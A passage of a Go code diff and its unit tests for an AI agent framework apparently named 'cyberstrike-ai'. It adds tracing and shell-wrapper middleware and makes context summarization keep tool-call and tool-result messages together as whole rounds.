// 此时 state.Messages 即为本次 LLM 调用的最终入参。
|
||||
type modelFacingTraceMiddleware struct {
|
||||
adk.BaseChatModelAgentMiddleware
|
||||
holder *modelFacingTraceHolder
|
||||
}
|
||||
|
||||
func newModelFacingTraceMiddleware(holder *modelFacingTraceHolder) adk.ChatModelAgentMiddleware {
|
||||
if holder == nil {
|
||||
return nil
|
||||
}
|
||||
return &modelFacingTraceMiddleware{holder: holder}
|
||||
}
|
||||
|
||||
func (m *modelFacingTraceMiddleware) BeforeModelRewriteState(
|
||||
ctx context.Context,
|
||||
state *adk.ChatModelAgentState,
|
||||
mc *adk.ModelContext,
|
||||
) (context.Context, *adk.ChatModelAgentState, error) {
|
||||
if m.holder != nil && state != nil {
|
||||
m.holder.storeFromState(state)
|
||||
}
|
||||
return ctx, state, nil
|
||||
}
|
||||
@@ -41,6 +41,8 @@ type PlanExecuteRootArgs struct {
|
||||
FilesystemMiddleware adk.ChatModelAgentMiddleware
|
||||
// PlannerReplannerRewriteHandlers applies BeforeModelRewriteState pipeline for planner/replanner input.
|
||||
PlannerReplannerRewriteHandlers []adk.ChatModelAgentMiddleware
|
||||
// ModelFacingTrace 可选:由 Executor Handlers 链末尾写入,供 last_react 与 summarization 后上下文对齐。
|
||||
ModelFacingTrace *modelFacingTraceHolder
|
||||
}
|
||||
|
||||
// NewPlanExecuteRoot 返回 plan → execute → replan 预置编排根节点(与 Deep / Supervisor 并列)。
|
||||
@@ -95,9 +97,17 @@ func NewPlanExecuteRoot(ctx context.Context, a *PlanExecuteRootArgs) (adk.Resuma
|
||||
}
|
||||
execHandlers = append(execHandlers, sumMw)
|
||||
}
|
||||
// 5. 孤儿 tool 消息兜底:必须挂在所有改写历史中间件(summarization/reduction/skill)之后、
|
||||
// telemetry 之前,保证送入 ChatModel 的消息序列 tool_call ↔ tool_result 配对完整。
|
||||
execHandlers = append(execHandlers, newOrphanToolPrunerMiddleware(a.Logger, "plan_execute_executor"))
|
||||
if teleMw := newEinoModelInputTelemetryMiddleware(a.Logger, a.ModelName, a.ConversationID, "plan_execute_executor"); teleMw != nil {
|
||||
execHandlers = append(execHandlers, teleMw)
|
||||
}
|
||||
if a.ModelFacingTrace != nil {
|
||||
if capMw := newModelFacingTraceMiddleware(a.ModelFacingTrace); capMw != nil {
|
||||
execHandlers = append(execHandlers, capMw)
|
||||
}
|
||||
}
|
||||
executor, err := newPlanExecuteExecutor(ctx, &planexecute.ExecutorConfig{
|
||||
Model: a.ExecModel,
|
||||
ToolsConfig: a.ToolsCfg,
|
||||
|
||||
@@ -13,6 +13,7 @@ import (
|
||||
"cyberstrike-ai/internal/config"
|
||||
"cyberstrike-ai/internal/einomcp"
|
||||
"cyberstrike-ai/internal/openai"
|
||||
"cyberstrike-ai/internal/reasoning"
|
||||
|
||||
einoopenai "github.com/cloudwego/eino-ext/components/model/openai"
|
||||
"github.com/cloudwego/eino/adk"
|
||||
@@ -37,6 +38,7 @@ func RunEinoSingleChatModelAgent(
|
||||
history []agent.ChatMessage,
|
||||
roleTools []string,
|
||||
progress func(eventType, message string, data interface{}),
|
||||
reasoningClient *reasoning.ClientIntent,
|
||||
) (*RunResult, error) {
|
||||
if appCfg == nil || ag == nil {
|
||||
return nil, fmt.Errorf("eino single: 配置或 Agent 为空")
|
||||
@@ -86,13 +88,15 @@ func RunEinoSingleChatModelAgent(
|
||||
})
|
||||
}
|
||||
|
||||
toolInvokeNotify := einomcp.NewToolInvokeNotifyHolder()
|
||||
einoExecMonitor := newEinoExecuteMonitorCallback(ag, recorder)
|
||||
mainDefs := ag.ToolsForRole(roleTools)
|
||||
mainTools, err := einomcp.ToolsFromDefinitions(ag, holder, mainDefs, recorder, toolOutputChunk)
|
||||
mainTools, err := einomcp.ToolsFromDefinitions(ag, holder, mainDefs, recorder, toolOutputChunk, toolInvokeNotify, einoSingleAgentName)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
mainToolsForCfg, mainOrchestratorPre, err := prependEinoMiddlewares(ctx, &ma.EinoMiddleware, einoMWMain, mainTools, einoLoc, skillsRoot, conversationID, logger)
|
||||
mainToolsForCfg, mainOrchestratorPre, singleToolSearchActive, err := prependEinoMiddlewares(ctx, &ma.EinoMiddleware, einoMWMain, mainTools, einoLoc, skillsRoot, conversationID, logger)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("eino single eino 中间件: %w", err)
|
||||
}
|
||||
@@ -119,6 +123,7 @@ func RunEinoSingleChatModelAgent(
|
||||
Model: appCfg.OpenAI.Model,
|
||||
HTTPClient: httpClient,
|
||||
}
|
||||
reasoning.ApplyToEinoChatModelConfig(baseModelCfg, &appCfg.OpenAI, reasoningClient)
|
||||
|
||||
mainModel, err := einoopenai.NewChatModel(ctx, baseModelCfg)
|
||||
if err != nil {
|
||||
@@ -130,13 +135,15 @@ func RunEinoSingleChatModelAgent(
|
||||
return nil, fmt.Errorf("eino single summarization: %w", err)
|
||||
}
|
||||
|
||||
handlers := make([]adk.ChatModelAgentMiddleware, 0, 4)
|
||||
modelFacingTrace := newModelFacingTraceHolder()
|
||||
|
||||
handlers := make([]adk.ChatModelAgentMiddleware, 0, 8)
|
||||
if len(mainOrchestratorPre) > 0 {
|
||||
handlers = append(handlers, mainOrchestratorPre...)
|
||||
}
|
||||
if einoSkillMW != nil {
|
||||
if einoFSTools && einoLoc != nil {
|
||||
fsMw, fsErr := subAgentFilesystemMiddleware(ctx, einoLoc)
|
||||
fsMw, fsErr := subAgentFilesystemMiddleware(ctx, einoLoc, toolInvokeNotify, einoSingleAgentName, einoExecMonitor, agentToolTimeoutMinutes(appCfg), toolOutputChunk)
|
||||
if fsErr != nil {
|
||||
return nil, fmt.Errorf("eino single filesystem 中间件: %w", fsErr)
|
||||
}
|
||||
@@ -148,6 +155,9 @@ func RunEinoSingleChatModelAgent(
|
||||
if teleMw := newEinoModelInputTelemetryMiddleware(logger, appCfg.OpenAI.Model, conversationID, "eino_single"); teleMw != nil {
|
||||
handlers = append(handlers, teleMw)
|
||||
}
|
||||
if capMw := newModelFacingTraceMiddleware(modelFacingTrace); capMw != nil {
|
||||
handlers = append(handlers, capMw)
|
||||
}
|
||||
|
||||
maxIter := ma.MaxIteration
|
||||
if maxIter <= 0 {
|
||||
@@ -162,28 +172,21 @@ func RunEinoSingleChatModelAgent(
|
||||
Tools: mainToolsForCfg,
|
||||
UnknownToolsHandler: einomcp.UnknownToolReminderHandler(),
|
||||
ToolCallMiddlewares: []compose.ToolMiddleware{
|
||||
{Invokable: hitlToolCallMiddleware()},
|
||||
{Invokable: softRecoveryToolCallMiddleware()},
|
||||
hitlToolCallMiddleware(),
|
||||
softRecoveryToolMiddleware(),
|
||||
},
|
||||
},
|
||||
EmitInternalEvents: true,
|
||||
}
|
||||
ins := injectToolNamesOnlyInstruction(ctx, ag.EinoSingleAgentSystemInstruction(), mainTools)
|
||||
ins := injectToolNamesOnlyInstruction(ctx, ag.EinoSingleAgentSystemInstruction(), mainTools, singleToolSearchActive)
|
||||
if logger != nil {
|
||||
names := collectToolNames(ctx, mainTools)
|
||||
mountedNames := collectToolNames(ctx, mainToolsForCfg)
|
||||
hasToolSearch := false
|
||||
for _, n := range names {
|
||||
if strings.EqualFold(strings.TrimSpace(n), "tool_search") {
|
||||
hasToolSearch = true
|
||||
break
|
||||
}
|
||||
}
|
||||
logger.Info("eino tool-name injection",
|
||||
zap.String("scope", "eino_single"),
|
||||
zap.Int("tool_names", len(names)),
|
||||
zap.Int("mounted_tool_names", len(mountedNames)),
|
||||
zap.Bool("has_tool_search", hasToolSearch),
|
||||
zap.Bool("tool_search_middleware", singleToolSearchActive),
|
||||
)
|
||||
}
|
||||
|
||||
@@ -221,18 +224,23 @@ func RunEinoSingleChatModelAgent(
|
||||
}
|
||||
|
||||
return runEinoADKAgentLoop(ctx, &einoADKRunLoopArgs{
|
||||
OrchMode: "eino_single",
|
||||
OrchestratorName: einoSingleAgentName,
|
||||
ConversationID: conversationID,
|
||||
Progress: progress,
|
||||
Logger: logger,
|
||||
SnapshotMCPIDs: snapshotMCPIDs,
|
||||
StreamsMainAssistant: streamsMainAssistant,
|
||||
EinoRoleTag: einoRoleTag,
|
||||
CheckpointDir: ma.EinoMiddleware.CheckpointDir,
|
||||
McpIDsMu: &mcpIDsMu,
|
||||
McpIDs: &mcpIDs,
|
||||
DA: chatAgent,
|
||||
OrchMode: "eino_single",
|
||||
OrchestratorName: einoSingleAgentName,
|
||||
ConversationID: conversationID,
|
||||
Progress: progress,
|
||||
Logger: logger,
|
||||
SnapshotMCPIDs: snapshotMCPIDs,
|
||||
StreamsMainAssistant: streamsMainAssistant,
|
||||
EinoRoleTag: einoRoleTag,
|
||||
CheckpointDir: ma.EinoMiddleware.CheckpointDir,
|
||||
McpIDsMu: &mcpIDsMu,
|
||||
McpIDs: &mcpIDs,
|
||||
FilesystemMonitorAgent: ag,
|
||||
FilesystemMonitorRecord: recorder,
|
||||
ToolInvokeNotify: toolInvokeNotify,
|
||||
DA: chatAgent,
|
||||
ModelFacingTrace: modelFacingTrace,
|
||||
EinoCallbacks: &ma.EinoCallbacks,
|
||||
EmptyResponseMessage: "(Eino ADK single-agent session completed but no assistant text was captured. Check process details or logs.) " +
|
||||
"(Eino ADK 单代理会话已完成,但未捕获到助手文本输出。请查看过程详情或日志。)",
|
||||
}, baseMsgs)
|
||||
|
||||
@@ -8,6 +8,7 @@ import (
|
||||
"strings"
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
"cyberstrike-ai/internal/einomcp"
|
||||
|
||||
localbk "github.com/cloudwego/eino-ext/adk/backend/local"
|
||||
"github.com/cloudwego/eino/adk"
|
||||
@@ -75,12 +76,35 @@ func prepareEinoSkills(
|
||||
// subAgentFilesystemMiddleware returns filesystem middleware for a sub-agent when Deep itself
|
||||
// does not set Backend (fsTools false on orchestrator) but we still want tools on subs — not used;
|
||||
// when orchestrator has Backend, builtin FS is only on outer agent; subs need explicit FS for parity.
|
||||
func subAgentFilesystemMiddleware(ctx context.Context, loc *localbk.Local) (adk.ChatModelAgentMiddleware, error) {
|
||||
func subAgentFilesystemMiddleware(
|
||||
ctx context.Context,
|
||||
loc *localbk.Local,
|
||||
invokeNotify *einomcp.ToolInvokeNotifyHolder,
|
||||
einoAgentName string,
|
||||
recordMonitor func(command, stdout string, success bool, invokeErr error),
|
||||
toolTimeoutMinutes int,
|
||||
outputChunk func(toolName, toolCallID, chunk string),
|
||||
) (adk.ChatModelAgentMiddleware, error) {
|
||||
if loc == nil {
|
||||
return nil, nil
|
||||
}
|
||||
return filesystem.New(ctx, &filesystem.MiddlewareConfig{
|
||||
Backend: loc,
|
||||
StreamingShell: loc,
|
||||
Backend: loc,
|
||||
StreamingShell: &einoStreamingShellWrap{
|
||||
inner: loc,
|
||||
invokeNotify: invokeNotify,
|
||||
einoAgentName: strings.TrimSpace(einoAgentName),
|
||||
outputChunk: outputChunk,
|
||||
recordMonitor: recordMonitor,
|
||||
toolTimeoutMinutes: toolTimeoutMinutes,
|
||||
},
|
||||
})
|
||||
}
|
||||
|
||||
// agentToolTimeoutMinutes 返回 agent.tool_timeout_minutes(与 executeToolViaMCP 一致);cfg 为 nil 时 0。
|
||||
func agentToolTimeoutMinutes(cfg *config.Config) int {
|
||||
if cfg == nil {
|
||||
return 0
|
||||
}
|
||||
return cfg.Agent.ToolTimeoutMinutes
|
||||
}
|
||||
|
||||
@@ -130,6 +130,14 @@ func newEinoSummarizationMiddleware(
|
||||
}
|
||||
|
||||
// summarizeFinalizeWithRecentAssistantToolTrail 在摘要消息后保留最近 assistant/tool 轨迹,避免压缩后执行链断裂。
|
||||
//
|
||||
// 关键不变量:tool_call ↔ tool_result 的 pair 必须整体保留或整体丢弃。
|
||||
// 把消息切成 round(回合)为原子单位:
|
||||
// - user(...) 单条为一个 round;
|
||||
// - assistant(tool_calls=[...]) 及其后连续的 role=tool 消息合成一个 round;
|
||||
// - 其它 assistant(reply, 无 tool_calls) 单条为一个 round。
|
||||
//
|
||||
// 倒序挑 round(预算不够即放弃该 round),保证 tool 消息不会跨 round 被孤立。
|
||||
func summarizeFinalizeWithRecentAssistantToolTrail(
|
||||
ctx context.Context,
|
||||
originalMessages []adk.Message,
|
||||
@@ -157,80 +165,136 @@ func summarizeFinalizeWithRecentAssistantToolTrail(
|
||||
return out, nil
|
||||
}
|
||||
|
||||
selectedReverse := make([]adk.Message, 0, 8)
|
||||
seen := make(map[adk.Message]struct{})
|
||||
totalTokens := 0
|
||||
assistantToolKept := 0
|
||||
const minAssistantToolTrail = 4
|
||||
rounds := splitMessagesIntoRounds(nonSystem)
|
||||
if len(rounds) == 0 {
|
||||
out := make([]adk.Message, 0, len(systemMsgs)+1)
|
||||
out = append(out, systemMsgs...)
|
||||
out = append(out, summary)
|
||||
return out, nil
|
||||
}
|
||||
|
||||
tryKeep := func(msg adk.Message) (bool, error) {
|
||||
if msg == nil {
|
||||
return false, nil
|
||||
// 目标:至少保留 minRounds 个 round 的执行轨迹;在预算允许时尽量多保留。
|
||||
// 优先确保最后一个 round(通常是最新的 tool 往返或 assistant 回复)存在。
|
||||
const minRounds = 2
|
||||
|
||||
selectedRoundsReverse := make([]messageRound, 0, 8)
|
||||
selectedCount := 0
|
||||
totalTokens := 0
|
||||
|
||||
tokensOfRound := func(r messageRound) (int, error) {
|
||||
if len(r.messages) == 0 {
|
||||
return 0, nil
|
||||
}
|
||||
if _, ok := seen[msg]; ok {
|
||||
return false, nil
|
||||
}
|
||||
n, err := tokenCounter(ctx, &summarization.TokenCounterInput{Messages: []adk.Message{msg}})
|
||||
n, err := tokenCounter(ctx, &summarization.TokenCounterInput{Messages: r.messages})
|
||||
if err != nil {
|
||||
return false, err
|
||||
return 0, err
|
||||
}
|
||||
if n <= 0 {
|
||||
n = 1
|
||||
n = len(r.messages)
|
||||
}
|
||||
return n, nil
|
||||
}
|
||||
|
||||
for i := len(rounds) - 1; i >= 0; i-- {
|
||||
r := rounds[i]
|
||||
n, err := tokensOfRound(r)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
// 预算不够:已经保留了足够 round 则停,否则跳过该 round 继续往前找
|
||||
// (避免一个超大 round 挤占全部预算,至少保证有轨迹)。
|
||||
if totalTokens+n > recentTrailTokenBudget {
|
||||
return false, nil
|
||||
if selectedCount >= minRounds {
|
||||
break
|
||||
}
|
||||
continue
|
||||
}
|
||||
totalTokens += n
|
||||
selectedReverse = append(selectedReverse, msg)
|
||||
seen[msg] = struct{}{}
|
||||
return true, nil
|
||||
selectedRoundsReverse = append(selectedRoundsReverse, r)
|
||||
selectedCount++
|
||||
}
|
||||
|
||||
// 优先保留最近 assistant/tool,确保执行轨迹可续跑。
|
||||
for i := len(nonSystem) - 1; i >= 0; i-- {
|
||||
msg := nonSystem[i]
|
||||
if msg.Role != schema.Assistant && msg.Role != schema.Tool {
|
||||
continue
|
||||
}
|
||||
ok, err := tryKeep(msg)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if ok {
|
||||
assistantToolKept++
|
||||
}
|
||||
if assistantToolKept >= minAssistantToolTrail {
|
||||
break
|
||||
}
|
||||
// 还原时间顺序。round 内为原始 *schema.Message 指针,保留 ReasoningContent(DeepSeek 工具续跑所必需)。
|
||||
selectedMsgs := make([]adk.Message, 0, 8)
|
||||
for i := len(selectedRoundsReverse) - 1; i >= 0; i-- {
|
||||
selectedMsgs = append(selectedMsgs, selectedRoundsReverse[i].messages...)
|
||||
}
|
||||
|
||||
// 在预算内回填更多最近消息,保持短链路上下文。
|
||||
for i := len(nonSystem) - 1; i >= 0; i-- {
|
||||
_, exists := seen[nonSystem[i]]
|
||||
if exists {
|
||||
continue
|
||||
}
|
||||
ok, err := tryKeep(nonSystem[i])
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if !ok {
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
selected := make([]adk.Message, 0, len(selectedReverse))
|
||||
for i := len(selectedReverse) - 1; i >= 0; i-- {
|
||||
selected = append(selected, selectedReverse[i])
|
||||
}
|
||||
|
||||
out := make([]adk.Message, 0, len(systemMsgs)+1+len(selected))
|
||||
out := make([]adk.Message, 0, len(systemMsgs)+1+len(selectedMsgs))
|
||||
out = append(out, systemMsgs...)
|
||||
out = append(out, summary)
|
||||
out = append(out, selected...)
|
||||
out = append(out, selectedMsgs...)
|
||||
return out, nil
|
||||
}
|
||||
|
||||
// messageRound 表示一个"不可分割"的消息回合。
|
||||
// - 对 assistant(tool_calls) + 随后若干 tool 消息的组合,round 内全部 call_id 成对完整;
|
||||
// - 对独立的 user / assistant(reply) 消息,round 仅包含该条消息。
|
||||
type messageRound struct {
|
||||
messages []adk.Message
|
||||
}
|
||||
|
||||
// splitMessagesIntoRounds 将非 system 消息切分为若干 round,保证:
|
||||
// - 每个 assistant(tool_calls) 与其对应的 role=tool 响应消息在同一个 round;
|
||||
// - 孤立(无对应 assistant(tool_calls))的 role=tool 消息不会单独成为 round,
|
||||
// 而是被丢弃(这些消息在 pair 完整性层面已属孤儿,保留反而会触发 LLM 400)。
|
||||
func splitMessagesIntoRounds(msgs []adk.Message) []messageRound {
|
||||
if len(msgs) == 0 {
|
||||
return nil
|
||||
}
|
||||
rounds := make([]messageRound, 0, len(msgs))
|
||||
i := 0
|
||||
for i < len(msgs) {
|
||||
msg := msgs[i]
|
||||
if msg == nil {
|
||||
i++
|
||||
continue
|
||||
}
|
||||
switch {
|
||||
case msg.Role == schema.Assistant && len(msg.ToolCalls) > 0:
|
||||
// 收集该 assistant 提供的 call_id 集合。
|
||||
provided := make(map[string]struct{}, len(msg.ToolCalls))
|
||||
for _, tc := range msg.ToolCalls {
|
||||
if tc.ID != "" {
|
||||
provided[tc.ID] = struct{}{}
|
||||
}
|
||||
}
|
||||
round := messageRound{messages: []adk.Message{msg}}
|
||||
j := i + 1
|
||||
for j < len(msgs) {
|
||||
next := msgs[j]
|
||||
if next == nil {
|
||||
j++
|
||||
continue
|
||||
}
|
||||
if next.Role != schema.Tool {
|
||||
break
|
||||
}
|
||||
if next.ToolCallID != "" {
|
||||
if _, ok := provided[next.ToolCallID]; !ok {
|
||||
// 下一条 tool 不属于当前 assistant,认为当前 round 结束。
|
||||
break
|
||||
}
|
||||
}
|
||||
round.messages = append(round.messages, next)
|
||||
j++
|
||||
}
|
||||
rounds = append(rounds, round)
|
||||
i = j
|
||||
case msg.Role == schema.Tool:
|
||||
// 孤儿 tool 消息:既不跟随在一个 assistant(tool_calls) 后,
|
||||
// 说明它对应的 assistant 已被上游裁剪;直接丢弃,下一步到 orphan pruner
|
||||
// 兜底也不会出错,但在 round 切分这里就剔除更干净。
|
||||
i++
|
||||
default:
|
||||
// user / assistant(reply) / 其它:单条成 round。
|
||||
rounds = append(rounds, messageRound{messages: []adk.Message{msg}})
|
||||
i++
|
||||
}
|
||||
}
|
||||
return rounds
|
||||
}
|
||||
|
||||
func einoSummarizationTokenCounter(openAIModel string) summarization.TokenCounterFunc {
|
||||
tc := agent.NewTikTokenCounter()
|
||||
return func(ctx context.Context, input *summarization.TokenCounterInput) (int, error) {
|
||||
|
||||
@@ -0,0 +1,345 @@
|
||||
package multiagent
|
||||
|
||||
import (
|
||||
"context"
|
||||
"testing"
|
||||
|
||||
"github.com/cloudwego/eino/adk"
|
||||
"github.com/cloudwego/eino/adk/middlewares/summarization"
|
||||
"github.com/cloudwego/eino/schema"
|
||||
)
|
||||
|
||||
// fixedTokenCounter 让 tool 消息按 tokensPerToolMessage 计,其它消息按 1 计。
|
||||
// 用于验证 tool-round 超预算时整体被跳过的分支。
|
||||
func fixedTokenCounter(tokensPerToolMessage int) summarization.TokenCounterFunc {
|
||||
return func(_ context.Context, in *summarization.TokenCounterInput) (int, error) {
|
||||
total := 0
|
||||
for _, msg := range in.Messages {
|
||||
if msg == nil {
|
||||
continue
|
||||
}
|
||||
switch msg.Role {
|
||||
case schema.Tool:
|
||||
total += tokensPerToolMessage
|
||||
default:
|
||||
total++
|
||||
}
|
||||
}
|
||||
return total, nil
|
||||
}
|
||||
}
|
||||
|
||||
// variableTokenCounter 让 tool 消息按 len(Content) 计(可区分不同大小的 tool 结果),
|
||||
// 其它消息按 1 计;assistant 附加 len(ToolCalls) token 近似 tool_calls schema 开销。
|
||||
func variableTokenCounter() summarization.TokenCounterFunc {
|
||||
return func(_ context.Context, in *summarization.TokenCounterInput) (int, error) {
|
||||
total := 0
|
||||
for _, msg := range in.Messages {
|
||||
if msg == nil {
|
||||
continue
|
||||
}
|
||||
if msg.Role == schema.Tool {
|
||||
total += len(msg.Content)
|
||||
continue
|
||||
}
|
||||
total++
|
||||
total += len(msg.ToolCalls)
|
||||
}
|
||||
return total, nil
|
||||
}
|
||||
}
|
||||
|
||||
func TestSplitMessagesIntoRounds_Complex(t *testing.T) {
|
||||
msgs := []adk.Message{
|
||||
schema.UserMessage("q1"),
|
||||
assistantToolCallsMsg("", "c1", "c2"),
|
||||
schema.ToolMessage("r1", "c1"),
|
||||
schema.ToolMessage("r2", "c2"),
|
||||
schema.AssistantMessage("reply1", nil),
|
||||
schema.UserMessage("q2"),
|
||||
assistantToolCallsMsg("", "c3"),
|
||||
schema.ToolMessage("r3", "c3"),
|
||||
}
|
||||
rounds := splitMessagesIntoRounds(msgs)
|
||||
// 5 rounds: user(q1) | assistant(tc:c1,c2)+tool*2 | assistant(reply1) | user(q2) | assistant(tc:c3)+tool(c3)
|
||||
if len(rounds) != 5 {
|
||||
t.Fatalf("want 5 rounds, got %d", len(rounds))
|
||||
}
|
||||
// round 1 应为 tool-round,必须成对
|
||||
r1 := rounds[1]
|
||||
if len(r1.messages) != 3 {
|
||||
t.Fatalf("rounds[1] size: want 3, got %d", len(r1.messages))
|
||||
}
|
||||
if r1.messages[0].Role != schema.Assistant || len(r1.messages[0].ToolCalls) != 2 {
|
||||
t.Fatalf("rounds[1][0] must be assistant(tc=2)")
|
||||
}
|
||||
for i := 1; i < 3; i++ {
|
||||
if r1.messages[i].Role != schema.Tool {
|
||||
t.Fatalf("rounds[1][%d] must be tool, got %s", i, r1.messages[i].Role)
|
||||
}
|
||||
}
|
||||
// 最后一个 round 成对
|
||||
rLast := rounds[len(rounds)-1]
|
||||
if len(rLast.messages) != 2 {
|
||||
t.Fatalf("rounds[last] size: want 2, got %d", len(rLast.messages))
|
||||
}
|
||||
if rLast.messages[0].Role != schema.Assistant || rLast.messages[1].Role != schema.Tool {
|
||||
t.Fatalf("last round must be assistant(tc)+tool(c3)")
|
||||
}
|
||||
}
|
||||
|
||||
func TestSplitMessagesIntoRounds_DropsOrphanTool(t *testing.T) {
|
||||
// 起点直接是 tool 消息(孤儿)—— 应被丢弃,不独立成 round。
|
||||
msgs := []adk.Message{
|
||||
schema.ToolMessage("orphan", "c_old"),
|
||||
schema.UserMessage("continue"),
|
||||
assistantToolCallsMsg("", "c_new"),
|
||||
schema.ToolMessage("r_new", "c_new"),
|
||||
}
|
||||
rounds := splitMessagesIntoRounds(msgs)
|
||||
// user(continue) | assistant(tc:c_new)+tool(c_new) → 2 rounds
|
||||
if len(rounds) != 2 {
|
||||
t.Fatalf("want 2 rounds after dropping orphan, got %d", len(rounds))
|
||||
}
|
||||
for _, r := range rounds {
|
||||
for _, m := range r.messages {
|
||||
if m.Role == schema.Tool && m.ToolCallID == "c_old" {
|
||||
t.Fatalf("orphan tool c_old must not appear in any round")
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestSplitMessagesIntoRounds_ToolBelongsToCurrentAssistantOnly(t *testing.T) {
|
||||
// 两个相邻 assistant(tc),第二个的 tool 不应被归到第一个 assistant。
|
||||
msgs := []adk.Message{
|
||||
assistantToolCallsMsg("", "c1"),
|
||||
schema.ToolMessage("r1", "c1"),
|
||||
assistantToolCallsMsg("", "c2"),
|
||||
schema.ToolMessage("r2", "c2"),
|
||||
}
|
||||
rounds := splitMessagesIntoRounds(msgs)
|
||||
if len(rounds) != 2 {
|
||||
t.Fatalf("want 2 rounds, got %d", len(rounds))
|
||||
}
|
||||
if len(rounds[0].messages) != 2 || rounds[0].messages[0].ToolCalls[0].ID != "c1" {
|
||||
t.Fatalf("round[0] wrong: %+v", rounds[0].messages)
|
||||
}
|
||||
if len(rounds[1].messages) != 2 || rounds[1].messages[0].ToolCalls[0].ID != "c2" {
|
||||
t.Fatalf("round[1] wrong: %+v", rounds[1].messages)
|
||||
}
|
||||
}
|
||||
|
||||
func TestSplitMessagesIntoRounds_ToolBelongsToWrongAssistant(t *testing.T) {
|
||||
// assistant(tc:c1) 后面跟一个 tool_call_id=c999 的 tool 消息(本不属它)。
|
||||
// 切分规则:该 tool 不应拼入第一个 round(配对不完整),round 在此结束。
|
||||
// 而 c999 又没有对应 assistant,应被当孤儿丢弃。
|
||||
msgs := []adk.Message{
|
||||
assistantToolCallsMsg("", "c1"),
|
||||
schema.ToolMessage("wrong", "c999"),
|
||||
schema.UserMessage("hi"),
|
||||
}
|
||||
rounds := splitMessagesIntoRounds(msgs)
|
||||
// assistant(tc:c1) 没有对应 tool(c1),但不是孤儿(patchtoolcalls 会兜底补);
|
||||
// 它独立成 round 允许上游后处理。user(hi) 独立成 round。共 2 rounds。
|
||||
if len(rounds) != 2 {
|
||||
t.Fatalf("want 2 rounds, got %d: %+v", len(rounds), rounds)
|
||||
}
|
||||
for _, r := range rounds {
|
||||
for _, m := range r.messages {
|
||||
if m.Role == schema.Tool && m.ToolCallID == "c999" {
|
||||
t.Fatalf("wrong-owner tool must be dropped as orphan")
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestSummarizeFinalize_KeepsToolRoundIntact(t *testing.T) {
|
||||
// 关键回归测试:一个 tool-round 整体被保留,而不是只保留 tool 消息。
|
||||
sys := schema.SystemMessage("sys")
|
||||
summary := schema.AssistantMessage("summary_content", nil)
|
||||
msgs := []adk.Message{
|
||||
sys,
|
||||
schema.UserMessage("q1"),
|
||||
schema.AssistantMessage("reply_before_tc", nil), // 填料,占预算
|
||||
assistantToolCallsMsg("", "c1"),
|
||||
schema.ToolMessage("r1", "c1"),
|
||||
}
|
||||
|
||||
// token 预算:2 条消息(1 assistant + 1 tool)恰好够用。
|
||||
// 若按条数保留,可能先吃 tool(c1) 再吃 assistant(reply) 落入 budget,assistant(tc:c1) 被挤掉,导致孤儿。
|
||||
// 按 round 保留时,整个 tool-round 为原子,要么保留 2 条都在,要么都不在。
|
||||
out, err := summarizeFinalizeWithRecentAssistantToolTrail(
|
||||
context.Background(),
|
||||
msgs,
|
||||
summary,
|
||||
fixedTokenCounter(1),
|
||||
2, // 预算:2 tokens
|
||||
)
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
}
|
||||
|
||||
// 必须包含 system + summary
|
||||
if len(out) < 2 {
|
||||
t.Fatalf("output too short: %d", len(out))
|
||||
}
|
||||
if out[0] != sys {
|
||||
t.Fatalf("first message must be system")
|
||||
}
|
||||
if out[1] != summary {
|
||||
t.Fatalf("second message must be summary")
|
||||
}
|
||||
|
||||
// 关键不变量:每个被保留的 tool 消息,必须能在输出中找到提供其 ToolCallID 的 assistant(tc)。
|
||||
assertNoOrphanTool(t, out)
|
||||
}
|
||||
|
||||
func TestSummarizeFinalize_SkipsOversizedToolRoundButKeepsSmallerRound(t *testing.T) {
|
||||
// 构造两个大小差异显著的 tool-round:
|
||||
// c_big round 的 tool 结果 content="aaaaaaaaaa"(10 bytes),round token ≈ 2 (assistant+tc) + 10 = 12
|
||||
// c_ok round 的 tool 结果 content="ok"(2 bytes),round token ≈ 2 + 2 = 4
|
||||
// 配上 budget=8,使得:
|
||||
// - 最新的 c_ok round(4)能放下;
|
||||
// - 进一步的中间 round(assistant reply + user)也能放下;
|
||||
// - 更早的 c_big round(12)放不下会被跳过(continue),而非 break。
|
||||
sys := schema.SystemMessage("sys")
|
||||
summary := schema.AssistantMessage("summary_content", nil)
|
||||
msgs := []adk.Message{
|
||||
sys,
|
||||
schema.UserMessage("q1"),
|
||||
assistantToolCallsMsg("", "c_big"),
|
||||
schema.ToolMessage("aaaaaaaaaa", "c_big"),
|
||||
schema.AssistantMessage("s", nil),
|
||||
schema.UserMessage("q2"),
|
||||
assistantToolCallsMsg("", "c_ok"),
|
||||
schema.ToolMessage("ok", "c_ok"),
|
||||
}
|
||||
|
||||
out, err := summarizeFinalizeWithRecentAssistantToolTrail(
|
||||
context.Background(),
|
||||
msgs,
|
||||
summary,
|
||||
variableTokenCounter(),
|
||||
8,
|
||||
)
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
}
|
||||
assertNoOrphanTool(t, out)
|
||||
|
||||
// c_big 整个 round 必须被丢弃(tool 和 assistant 都不能出现)
|
||||
for _, m := range out {
|
||||
if m == nil {
|
||||
continue
|
||||
}
|
||||
if m.Role == schema.Tool && m.ToolCallID == "c_big" {
|
||||
t.Fatal("oversized tool round must be skipped: tool(c_big) leaked")
|
||||
}
|
||||
if m.Role == schema.Assistant {
|
||||
for _, tc := range m.ToolCalls {
|
||||
if tc.ID == "c_big" {
|
||||
t.Fatal("oversized tool round must be skipped: assistant(tc:c_big) leaked")
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// 最近 round (c_ok) 作为一个原子单位必须整体保留。
|
||||
foundOKTool, foundOKAsst := false, false
|
||||
for _, m := range out {
|
||||
if m == nil {
|
||||
continue
|
||||
}
|
||||
if m.Role == schema.Tool && m.ToolCallID == "c_ok" {
|
||||
foundOKTool = true
|
||||
}
|
||||
if m.Role == schema.Assistant {
|
||||
for _, tc := range m.ToolCalls {
|
||||
